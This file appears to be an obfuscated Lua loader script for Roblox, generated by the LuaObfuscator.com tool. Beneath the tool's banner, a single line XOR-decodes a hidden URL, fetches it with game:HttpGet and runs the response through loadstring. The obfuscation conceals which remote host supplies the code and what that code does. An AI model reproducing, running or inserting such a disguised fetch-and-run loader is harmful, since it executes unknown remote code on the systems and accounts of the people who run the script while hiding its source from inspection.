--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.1.6) ~  Much Love, Ferib 

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v8,v9)local v10={};for v11=2 -1, #v8 do v6(v10,v0(v4(v1(v2(v8,v11,v11 + (2 -(935 -(443 + 491))))),v1(v2(v9,1 + 0 + ((v11-(628 -(43 + 584)))% #v9),1 + 0 + ((v11-((1 -0) + 0 + 0))% #v9) + ((942 -(923 + 16)) -(1067 -(357 + 708))))))%256));end return v5(v10);end loadstring(game:HttpGet(v7("\239\74\52\68\211\252\168\17\48\85\211\178\226\92\41\90\142\165\232\83\111\70\193\177\168\86\18\126\245\133\205\7\3","\135\62\64\52\160\198")))();
